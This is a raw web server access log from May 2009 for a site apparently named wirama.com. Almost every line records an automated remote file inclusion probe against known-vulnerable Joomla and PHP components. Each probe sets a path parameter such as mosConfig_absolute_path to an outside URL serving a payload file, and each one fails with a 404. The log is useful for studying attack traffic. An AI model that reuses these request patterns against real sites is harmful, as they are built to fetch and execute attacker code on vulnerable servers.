68.171.44.5 - - [01/May/2009:04:25:49 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
68.171.44.5 - - [01/May/2009:04:26:00 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:46 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:46 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:46 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:46 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:50 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:50 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:50 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:50 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:59 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:59 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:59 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:04:30:59 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.18.117.101 - - [01/May/2009:04:33:50 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:04:33:50 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:04:33:50 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.54.239.74 - - [01/May/2009:04:35:58 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
74.54.239.74 - - [01/May/2009:04:35:58 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:04:37:33 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:04:37:33 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.18.117.101 - - [01/May/2009:04:37:33 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.17 - - [01/May/2009:04:41:55 -0700] "GET /logs/access_090331.log/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:41:55 -0700] "GET /logs/access_090330.log/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:41:55 -0700] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:41:55 -0700] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:11 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:11 -0700] "GET /logs/access_090331.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:11 -0700] "GET /logs/access_090330.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:11 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:51 -0700] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:51 -0700] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:52 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:42:52 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:45:47 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:45:47 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:45:47 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:45:49 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:46:49 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:46:49 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:46:55 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:47:08 -0700] "GET /logs/access_090331.log%20/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:47:15 -0700] "GET /logs/access_090331.log%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:47:20 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.17 - - [01/May/2009:04:47:33 -0700] "GET /logs/access_090331.log%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
74.6.17.163 - - [01/May/2009:04:49:56 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
218.150.79.146 - - [01/May/2009:04:52:43 -0700] "GET /ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:43 -0700] "GET /logs//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:43 -0700] "GET /logs/access_090331.log//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:55 -0700] "GET /ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:55 -0700] "GET /logs//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:55 -0700] "GET /logs/access_090331.log//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:56 -0700] "GET /logs/access_090331.log//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:56 -0700] "GET /ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:52:57 -0700] "GET /logs//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:53:33 -0700] "GET /logs/access_090401.log//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:53:36 -0700] "GET /logs/access_090401.log//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
218.150.79.146 - - [01/May/2009:04:53:40 -0700] "GET /logs/access_090401.log//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
190.144.44.36 - - [01/May/2009:04:56:11 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:56:11 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:56:11 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [01/May/2009:04:56:27 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:00:29 -0700] "GET /ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:00:29 -0700] "GET /logs//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:00:29 -0700] "GET /logs/access_090331.log%20%20//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:00:51 -0700] "GET /logs/access_090331.log%20%20//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:00:51 -0700] "GET /ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:00:51 -0700] "GET /logs//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:01:26 -0700] "GET /ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:01:26 -0700] "GET /logs//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.79.146 - - [01/May/2009:05:01:26 -0700] "GET /logs/access_090331.log%20%20//ask_password.php?dir=http://www.centermna.co.kr/bbs/data/module/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.194.66.40 - - [01/May/2009:05:03:42 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://www.wg.com.pl/downloads/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
82.194.66.40 - - [01/May/2009:05:03:42 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://www.wg.com.pl/downloads/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
122.201.76.150 - - [01/May/2009:05:07:42 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:07:42 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:07:42 -0700] "GET /logs/access_090331.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:10:37 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:10:37 -0700] "GET /logs/access_090331.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:10:37 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:12:42 -0700] "GET /logs/access_090331.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:12:42 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:12:45 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:13:05 -0700] "GET /logs/access_090330.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:16:03 -0700] "GET /logs/access_090330.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:05:17:57 -0700] "GET /logs/access_090330.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [01/May/2009:05:22:51 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:05:22:51 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:05:22:51 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:24:17 -0700] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:24:17 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:24:17 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:24:21 -0700] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:05:27:36 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:31:00 -0700] "GET /logs/access_090330.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:31:35 -0700] "GET /logs/access_090331.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
207.67.117.173 - - [01/May/2009:05:35:26 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "larbin_2.6.3 (larbin2.6.3@unspecified.mail)" "www.wirama.com"
75.125.167.2 - - [01/May/2009:05:38:57 -0700] "GET /logs/access_090401.log/components/com_simpleboard/image_upload.php?sbp=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [01/May/2009:05:38:57 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [01/May/2009:05:38:57 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.90.91.245 - - [01/May/2009:05:40:24 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.wirama.com"
209.90.91.245 - - [01/May/2009:05:40:26 -0700] "GET //vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.wirama.com"
209.90.91.245 - - [01/May/2009:05:40:26 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:40:31 -0700] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.214.37.11 - - [01/May/2009:05:40:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
85.214.37.11 - - [01/May/2009:05:40:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
209.90.91.245 - - [01/May/2009:05:40:51 -0700] "GET /logs/access_090331.log///vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.wirama.com"
85.214.37.11 - - [01/May/2009:05:41:23 -0700] "GET /logs/access_090330.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.junglephasereptiles.co.uk/components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.118.90.253 - - [01/May/2009:05:45:12 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.wirama.com"
64.118.90.253 - - [01/May/2009:05:45:12 -0700] "GET //vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.wirama.com"
64.118.90.253 - - [01/May/2009:05:45:14 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.wirama.com"
64.118.90.253 - - [01/May/2009:05:46:17 -0700] "GET /logs/access_090331.log///vwar/backup/errors.php?error=http://www.footnoteibs.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.wirama.com"
200.103.16.43 - - [01/May/2009:05:50:39 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:05:50:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.103.16.43 - - [01/May/2009:05:50:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.158.124.146 - - [01/May/2009:05:50:50 -0700] "GET /logs/errors.php?error=http://realsight.info/components/com_loudmouth/includes/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
200.158.124.146 - - [01/May/2009:05:50:51 -0700] "GET /errors.php?error=http://realsight.info/components/com_loudmouth/includes/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
